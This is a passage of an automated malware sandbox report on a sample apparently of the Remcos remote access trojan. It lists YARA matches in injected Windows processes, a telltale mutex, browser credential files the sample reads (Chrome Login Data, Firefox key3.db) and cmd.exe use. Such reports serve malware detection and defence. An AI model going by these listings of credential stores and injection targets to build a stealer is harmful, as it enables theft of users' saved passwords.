Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 6_2_0292B21B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 19_2_0294B21B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \key3.db 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 19_2_0294B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \key3.db 19_2_0294B335

Remote Access Functionality

Source: C:\Windows\SysWOW64\SndVol.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe Code function: cmd.exe 6_2_02925042
Source: C:\Windows\SysWOW64\SndVol.exe Code function: cmd.exe 19_2_02945042